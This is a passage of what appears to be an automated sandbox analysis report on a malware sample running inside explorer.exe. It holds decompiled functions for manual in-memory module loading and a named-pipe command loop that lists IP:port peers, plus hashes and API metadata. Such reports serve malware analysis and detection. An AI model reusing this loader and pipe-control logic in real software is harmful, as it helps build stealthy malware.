					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                            0x032f3ded
                                                                                                            0x032f3dfa
                                                                                                            0x032f3e00
                                                                                                            0x032f3e09
                                                                                                            0x032f3e0c
                                                                                                            0x032f3e0f
                                                                                                            0x00000000
                                                                                                            0x032f3f00
                                                                                                            0x032f3f04
                                                                                                            0x032f3f06
                                                                                                            0x032f3f14
                                                                                                            0x032f4032
                                                                                                            0x032f4036
                                                                                                            0x032f40fb
                                                                                                            0x032f4104
                                                                                                            0x032f4107
                                                                                                            0x032f410b
                                                                                                            0x032f4111
                                                                                                            0x032f4119
                                                                                                            0x032f4119
                                                                                                            0x032f4121
                                                                                                            0x032f412f
                                                                                                            0x032f4132
                                                                                                            0x032f4136
                                                                                                            0x032f413c
                                                                                                            0x032f414c
                                                                                                            0x032f4177
                                                                                                            0x00000000
                                                                                                            0x032f4179
                                                                                                            0x032f4152
                                                                                                            0x032f4163
                                                                                                            0x00000000
                                                                                                            0x032f4171
                                                                                                            0x032f4175
                                                                                                            0x00000000
                                                                                                            0x032f4171
                                                                                                            0x032f4165
                                                                                                            0x032f4169
                                                                                                            0x032f416e
                                                                                                            0x00000000
                                                                                                            0x032f416e
                                                                                                            0x032f4154
                                                                                                            0x032f4158
                                                                                                            0x032f415a
                                                                                                            0x00000000
                                                                                                            0x032f415a
                                                                                                            0x032f413e
                                                                                                            0x032f4142
                                                                                                            0x00000000
                                                                                                            0x032f4144
                                                                                                            0x032f403c
                                                                                                            0x032f4040
                                                                                                            0x032f4042
                                                                                                            0x032f4050
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f4056
                                                                                                            0x032f405f
                                                                                                            0x032f406d
                                                                                                            0x032f4079
                                                                                                            0x032f4085
                                                                                                            0x032f408e
                                                                                                            0x032f4091
                                                                                                            0x032f4095
                                                                                                            0x032f4097
                                                                                                            0x032f40a4
                                                                                                            0x032f40b8
                                                                                                            0x032f40c7
                                                                                                            0x032f40d8
                                                                                                            0x032f40a1
                                                                                                            0x00000000
                                                                                                            0x032f40a1
                                                                                                            0x032f40da
                                                                                                            0x032f40de
                                                                                                            0x032f40e3
                                                                                                            0x00000000
                                                                                                            0x032f40e3
                                                                                                            0x032f40ee
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f40f0
                                                                                                            0x032f40f4
                                                                                                            0x00000000
                                                                                                            0x032f40f6
                                                                                                            0x032f3f1a
                                                                                                            0x032f3f23
                                                                                                            0x032f3f31
                                                                                                            0x032f3f34
                                                                                                            0x032f3f51
                                                                                                            0x032f3f58
                                                                                                            0x032f3f6a
                                                                                                            0x032f3f6a
                                                                                                            0x032f3f71
                                                                                                            0x032f3f81
                                                                                                            0x032f3f99
                                                                                                            0x032f3f83
                                                                                                            0x032f3f8b
                                                                                                            0x032f3f8b
                                                                                                            0x032f3f9c
                                                                                                            0x032f3fa0
                                                                                                            0x032f3fb0
                                                                                                            0x032f3fd3
                                                                                                            0x032f3fe5
                                                                                                            0x032f3fb2
                                                                                                            0x032f3fc6
                                                                                                            0x032f3fc6
                                                                                                            0x032f3fef
                                                                                                            0x032f400b
                                                                                                            0x032f3ff1
                                                                                                            0x032f4000
                                                                                                            0x032f4000
                                                                                                            0x032f4013
                                                                                                            0x032f401c
                                                                                                            0x032f401c
                                                                                                            0x032f402a
                                                                                                            0x00000000
                                                                                                            0x032f3f73
                                                                                                            0x032f3f75
                                                                                                            0x00000000
                                                                                                            0x032f3f75
                                                                                                            0x032f3f71
                                                                                                            0x00000000
                                                                                                            0x032f3f34
                                                                                                            0x032f3e17
                                                                                                            0x032f3e25
                                                                                                            0x032f3e2a
                                                                                                            0x032f3e35
                                                                                                            0x032f3e38
                                                                                                            0x032f3e3c
                                                                                                            0x032f3e3e
                                                                                                            0x032f3e4e
                                                                                                            0x032f3e57
                                                                                                            0x032f3e60
                                                                                                            0x032f3e68
                                                                                                            0x032f3e71
                                                                                                            0x032f3e7c
                                                                                                            0x032f3e82
                                                                                                            0x032f3e85
                                                                                                            0x032f3e88
                                                                                                            0x032f3e8f
                                                                                                            0x032f3e96
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f3ea1
                                                                                                            0x032f3eaf
                                                                                                            0x032f3eba
                                                                                                            0x032f3ec4
                                                                                                            0x032f3edc
                                                                                                            0x032f3ee9
                                                                                                            0x032f3ee9
                                                                                                            0x032f3ec6
                                                                                                            0x032f3ed1
                                                                                                            0x032f3ed1
                                                                                                            0x032f3ef0
                                                                                                            0x032f3ef0
                                                                                                            0x032f3ef8
                                                                                                            0x032f3ef8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 032F3F4B
                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 032F3F64
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 032F3FC0
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 032F3FDF
                                                                                                            • lstrcmpA.KERNEL32(?,00000000), ref: 032F40D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1872726118-0
                                                                                                            • Opcode ID: ba68ef8c4877d586df70e591b7e6e97e3b85c164401db47df0f82c9530b54c11
                                                                                                            • Instruction ID: 15ec572404605c2e8bb0e6217e6b8733affd239389caea35e9fc4fba0f52c948
                                                                                                            • Opcode Fuzzy Hash: ba68ef8c4877d586df70e591b7e6e97e3b85c164401db47df0f82c9530b54c11
                                                                                                            • Instruction Fuzzy Hash: 5DE1A074A2020ADFCB14DFA9C884AAEFBB1FF08354F148569EA15EB351D774A981CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F1A27 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                            • API String ID: 0-2132903582
                                                                                                            • Opcode ID: 9a3347c7f21785ca9d4fef630e77510c101c6e862787794ec493f81df2af0f75
                                                                                                            • Instruction ID: dbaec17d71e1e1ca787a6ec2829fa2913ec4e43205d94d0c4238ed348451d342
                                                                                                            • Opcode Fuzzy Hash: 9a3347c7f21785ca9d4fef630e77510c101c6e862787794ec493f81df2af0f75
                                                                                                            • Instruction Fuzzy Hash: 4641C731A30206DFDB28D96CCD9DBBEF658DF45614F980135FF0296284F2A1A9F1C651
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F33F7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E032F33F7(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L032F3550();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E032F33D0(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E032E8E72(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x32f1be2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                            0x032f33f7
                                                                                                            0x032f33fa
                                                                                                            0x032f33ff
                                                                                                            0x032f3403
                                                                                                            0x032f3403
                                                                                                            0x032f3409
                                                                                                            0x032f340d
                                                                                                            0x032f340e
                                                                                                            0x032f3411
                                                                                                            0x032f3412
                                                                                                            0x032f3417
                                                                                                            0x032f341a
                                                                                                            0x032f341b
                                                                                                            0x032f3420
                                                                                                            0x032f3427
                                                                                                            0x032f34b0
                                                                                                            0x032f34b0
                                                                                                            0x00000000
                                                                                                            0x032f3432
                                                                                                            0x032f3433
                                                                                                            0x032f3445
                                                                                                            0x032f346b
                                                                                                            0x032f346b
                                                                                                            0x032f3474
                                                                                                            0x032f3476
                                                                                                            0x032f347c
                                                                                                            0x032f34ab
                                                                                                            0x032f34ab
                                                                                                            0x032f34b3
                                                                                                            0x032f34b6
                                                                                                            0x032f34b6
                                                                                                            0x032f347e
                                                                                                            0x032f347f
                                                                                                            0x032f3485
                                                                                                            0x032f3487
                                                                                                            0x032f3487
                                                                                                            0x032f348c
                                                                                                            0x032f348b
                                                                                                            0x032f348b
                                                                                                            0x032f3493
                                                                                                            0x032f349f
                                                                                                            0x032f34a9
                                                                                                            0x032f34a9
                                                                                                            0x00000000
                                                                                                            0x032f3455
                                                                                                            0x032f3455
                                                                                                            0x032f3455
                                                                                                            0x032f345b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f345d
                                                                                                            0x032f3463
                                                                                                            0x032f3468
                                                                                                            0x00000000
                                                                                                            0x032f3468
                                                                                                            0x032f3445

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: strchr$_snprintf
                                                                                                            • String ID: %.*g
                                                                                                            • API String ID: 3619936089-952554281
                                                                                                            • Opcode ID: 5fd368ae9d7c0a5a2d5fbe829e8c482e7c23a1b56095f6b0901ed41ea96e81f3
                                                                                                            • Instruction ID: 69c85acb039d2e6f0cbfd33052e43642a57b60e81a8fffa41a4bb2fd318e36f3
                                                                                                            • Opcode Fuzzy Hash: 5fd368ae9d7c0a5a2d5fbe829e8c482e7c23a1b56095f6b0901ed41ea96e81f3
                                                                                                            • Instruction Fuzzy Hash: 8221F03E624E162EDB23DA289C81FAAF79C9F44624F184179FF048A280E7A4D9C443D5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032E371E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310pipeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E032E371E(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				signed int _t145;
				signed int _t147;
				signed short* _t148;
				signed int _t158;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				signed short* _t191;
				void* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t207;
				void* _t209;
				void* _t215;
				void* _t222;

				_t222 = __fp0;
				_t209 = (_t207 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x32ff8e0; // 0x52ef6c8
					_push(0);
					_push( *0x32ff8c4);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x32ff8e0; // 0x52ef6c8
					_push(0x80000);
					_push( *0x32ff984);
					_push( *0x32ff8c4);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t148 =  *0x32ff984; // 0x0
						_t80 =  *_t148 & 0x0000ffff;
						_t215 = _t80 - 8;
						if(_t215 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E032F09E0( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t186);
								E032ED2AB(_t186);
								L32:
								L56:
								DisconnectNamedPipe( *0x32ff8c4);
								_push(0);
								_pop(0);
								_push(1);
								_pop(1);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E032E16B0( &_v204, _t222);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t145 = _v204;
								_t90 = _t145 * 0x16;
								_v184 = _t145 * 0x16;
								_t203 = E032E8D70(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t187 = 0xa;
									E032ED2AB(_t187);
									L52:
									E032E8D86( &_v188, _t145);
									goto L32;
								}
								_t198 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L50:
									_push(E032EA5DA(_t203));
									_push(_t203);
									_t188 = 5;
									E032ED2AB(_t188);
									E032E8D86( &_v192, 0xffffffff);
									_t209 = _t209 + 0x10;
									goto L52;
								}
								_t158 = _v188 + 4;
								__eflags = _t158;
								_v204 = _t158;
								do {
									__eflags = _t198;
									if(_t198 != 0) {
										__eflags = _t198 - _t145 - 1;
										if(_t198 < _t145 - 1) {
											_t102 = E032EA5DA(_t203);
											_t158 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t158;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E032EA5DA(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E032EA5DA(_t203) + _t203;
										__eflags = _t110;
										E032E9FAF(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t158 = _v204;
										_t209 = _t209 + 0x20;
									}
									_t198 = _t198 + 1;
									_t158 = _t158 + 0x20;
									_v204 = _t158;
									__eflags = _t198 - _t145;
								} while (_t198 < _t145);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E032E16B0( &_v204, _t222);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E032E8D86( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t215 == 0) {
							_t84 = E032F09E0( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t199 = E032E9CD0( &(_t148[4]), 0x20, 1,  &_v176);
							_v196 = _t199;
							__eflags = _t199;
							if(_t199 == 0) {
								L30:
								_t191 =  *0x32ff984; // 0x0
								E032EA078( &_v164,  &(_t191[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E032E1D6E(E032EA10C( *_t199, __eflags), 0, 0, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E032E8D70(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t147 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E032E1D6E(E032EA10C( *_t199, __eflags), _t127, _v184, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t129;
								E032E9DC9( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E032E9A1D( *((intOrPtr*)(_t199 + _t147 * 4)), E032EA5DA( *((intOrPtr*)(_t199 + _t147 * 4))));
								_t182 = _v204;
								_t147 = _t147 + 1;
								 *_t182 = _t132;
								_v204 = _t182 + 4;
								__eflags = _t147 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t195 = 5;
							E032ED2AB(_t195);
							 *0x32ff9b8 = 1;
							_v172 = 1;
							goto L56;
						}
						_t136 = _t133;
						if(_t136 == 0) {
							_t84 = E032F09BE( &_v200);
							goto L16;
						}
						if(_t136 != 1) {
							goto L56;
						}
						E032F09BE( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                            0x032e371e
                                                                                                            0x032e3724
                                                                                                            0x032e3731
                                                                                                            0x032e3736
                                                                                                            0x032e373a
                                                                                                            0x032e373a
                                                                                                            0x032e373f
                                                                                                            0x032e3740
                                                                                                            0x032e3746
                                                                                                            0x032e3752
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032e3765
                                                                                                            0x032e376a
                                                                                                            0x032e376b
                                                                                                            0x032e3770
                                                                                                            0x032e3775
                                                                                                            0x032e377b
                                                                                                            0x032e3789
                                                                                                            0x032e3a95
                                                                                                            0x00000000
                                                                                                            0x032e379a
                                                                                                            0x032e379a
                                                                                                            0x032e37a0
                                                                                                            0x032e37a3
                                                                                                            0x032e37a6
                                                                                                            0x032e3914
                                                                                                            0x032e3914
                                                                                                            0x032e3917
                                                                                                            0x032e3a8b
                                                                                                            0x032e37d5
                                                                                                            0x032e37d6
                                                                                                            0x032e37da
                                                                                                            0x032e37da
                                                                                                            0x032e37dc
                                                                                                            0x032e37dc
                                                                                                            0x032e37dd
                                                                                                            0x032e38f8
                                                                                                            0x032e38f8
                                                                                                            0x032e38f9
                                                                                                            0x032e38fe
                                                                                                            0x032e3a9b
                                                                                                            0x032e3aa1
                                                                                                            0x032e3aac
                                                                                                            0x032e3aae
                                                                                                            0x032e3aaf
                                                                                                            0x032e3ab1
                                                                                                            0x032e3ab2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032e3ab2
                                                                                                            0x032e391e
                                                                                                            0x032e391e
                                                                                                            0x032e3921
                                                                                                            0x032e3966
                                                                                                            0x032e396a
                                                                                                            0x032e396f
                                                                                                            0x032e3973
                                                                                                            0x032e3975
                                                                                                            0x032e3a76
                                                                                                            0x032e3a7c
                                                                                                            0x032e3a80
                                                                                                            0x032e37fb
                                                                                                            0x032e37fb
                                                                                                            0x00000000
                                                                                                            0x032e37fb
                                                                                                            0x032e397b
                                                                                                            0x032e397f
                                                                                                            0x032e3983
                                                                                                            0x032e398c
                                                                                                            0x032e398e
                                                                                                            0x032e3993
                                                                                                            0x032e3995
                                                                                                            0x032e3a50
                                                                                                            0x032e3a50
                                                                                                            0x032e3a50
                                                                                                            0x032e3a59
                                                                                                            0x032e3a5b
                                                                                                            0x032e3a5e
                                                                                                            0x032e3a5f
                                                                                                            0x032e3a66
                                                                                                            0x032e3a6c
                                                                                                            0x00000000
                                                                                                            0x032e3a6c
                                                                                                            0x032e399b
                                                                                                            0x032e399d
                                                                                                            0x032e399f
                                                                                                            0x032e3a2e
                                                                                                            0x032e3a35
                                                                                                            0x032e3a36
                                                                                                            0x032e3a39
                                                                                                            0x032e3a3a
                                                                                                            0x032e3a46
                                                                                                            0x032e3a4b
                                                                                                            0x00000000
                                                                                                            0x032e3a4b
                                                                                                            0x032e39a9
                                                                                                            0x032e39a9
                                                                                                            0x032e39ac
                                                                                                            0x032e39b0
                                                                                                            0x032e39b0
                                                                                                            0x032e39b2
                                                                                                            0x032e39b7
                                                                                                            0x032e39b9
                                                                                                            0x032e39bc
                                                                                                            0x032e39c2
                                                                                                            0x032e39c6
                                                                                                            0x032e39c6
                                                                                                            0x032e39b9
                                                                                                            0x032e39cc
                                                                                                            0x032e39ce
                                                                                                            0x032e39d2
                                                                                                            0x032e39d4
                                                                                                            0x032e39d7
                                                                                                            0x032e39de
                                                                                                            0x032e39e7
                                                                                                            0x032e39ed
                                                                                                            0x032e39f2
                                                                                                            0x032e39fb
                                                                                                            0x032e3a13
                                                                                                            0x032e3a13
                                                                                                            0x032e3a16
                                                                                                            0x032e3a1b
                                                                                                            0x032e3a1f
                                                                                                            0x032e3a1f
                                                                                                            0x032e3a22
                                                                                                            0x032e3a23
                                                                                                            0x032e3a26
                                                                                                            0x032e3a2a
                                                                                                            0x032e3a2a
                                                                                                            0x00000000
                                                                                                            0x032e39b0
                                                                                                            0x032e3923
                                                                                                            0x032e3926
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032e3930
                                                                                                            0x032e3934
                                                                                                            0x032e3939
                                                                                                            0x032e393d
                                                                                                            0x032e3941
                                                                                                            0x032e3943
                                                                                                            0x032e394b
                                                                                                            0x032e3951
                                                                                                            0x032e3955
                                                                                                            0x032e3959
                                                                                                            0x00000000
                                                                                                            0x032e3959
                                                                                                            0x032e37ac
                                                                                                            0x032e390a
                                                                                                            0x032e37ee
                                                                                                            0x032e37ef
                                                                                                            0x032e37f1
                                                                                                            0x032e37f9
                                                                                                            0x032e37fa
                                                                                                            0x00000000
                                                                                                            0x032e37fa
                                                                                                            0x032e37f3
                                                                                                            0x00000000
                                                                                                            0x032e37f3
                                                                                                            0x032e37b2
                                                                                                            0x032e37b5
                                                                                                            0x032e382d
                                                                                                            0x032e382f
                                                                                                            0x032e3835
                                                                                                            0x032e3837
                                                                                                            0x032e38d4
                                                                                                            0x032e38d4
                                                                                                            0x032e38e6
                                                                                                            0x032e38ec
                                                                                                            0x032e38f5
                                                                                                            0x032e38f6
                                                                                                            0x00000000
                                                                                                            0x032e38f6
                                                                                                            0x032e383d
                                                                                                            0x032e3841
                                                                                                            0x032e3844
                                                                                                            0x032e38c8
                                                                                                            0x032e38cd
                                                                                                            0x032e38d0
                                                                                                            0x00000000
                                                                                                            0x032e38d0
                                                                                                            0x032e3846
                                                                                                            0x032e3849
                                                                                                            0x032e3851
                                                                                                            0x032e3856
                                                                                                            0x032e385b
                                                                                                            0x032e385d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032e3861
                                                                                                            0x032e3862
                                                                                                            0x032e3864
                                                                                                            0x032e3893
                                                                                                            0x032e38a2
                                                                                                            0x032e38a7
                                                                                                            0x032e38aa
                                                                                                            0x032e38b6
                                                                                                            0x00000000
                                                                                                            0x032e38b6
                                                                                                            0x032e3866
                                                                                                            0x032e386a
                                                                                                            0x032e3878
                                                                                                            0x032e387d
                                                                                                            0x032e3881
                                                                                                            0x032e3882
                                                                                                            0x032e3887
                                                                                                            0x032e388b
                                                                                                            0x032e388b
                                                                                                            0x032e388f
                                                                                                            0x00000000
                                                                                                            0x032e388f
                                                                                                            0x032e37b7
                                                                                                            0x032e37ba
                                                                                                            0x032e3802
                                                                                                            0x032e3803
                                                                                                            0x032e3806
                                                                                                            0x032e3807
                                                                                                            0x032e380e
                                                                                                            0x032e3814
                                                                                                            0x00000000
                                                                                                            0x032e3814
                                                                                                            0x032e37bd
                                                                                                            0x032e37c0
                                                                                                            0x032e37e9
                                                                                                            0x00000000
                                                                                                            0x032e37e9
                                                                                                            0x032e37c5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032e37d0
                                                                                                            0x00000000
                                                                                                            0x032e37d0
                                                                                                            0x032e3789
                                                                                                            0x032e3ac0

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32 ref: 032E3754
                                                                                                              • Part of subcall function 032ED2AB: FlushFileBuffers.KERNEL32(00000000,?,032E3A64,00000000,00000004), ref: 032ED2F1
                                                                                                            • DisconnectNamedPipe.KERNEL32 ref: 032E3AA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                            • String ID: %u.%u.%u.%u:%u
                                                                                                            • API String ID: 465096328-3858738763
                                                                                                            • Opcode ID: 29be193d221579311592e54ab2e4dca449646bb3da89797699d99b8ffd85b9e1
                                                                                                            • Instruction ID: c047f0736b5f51b2b3e057f3349ced5d99befd0ccb50757333a220a745a95e5b
                                                                                                            • Opcode Fuzzy Hash: 29be193d221579311592e54ab2e4dca449646bb3da89797699d99b8ffd85b9e1
                                                                                                            • Instruction Fuzzy Hash: 5DA10979528302AFD314EF64E886A6BB7E8FF85711F84892EF2549B280DB70D5C4CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F4180 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 99%
                                                                                                            			E032F4180(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
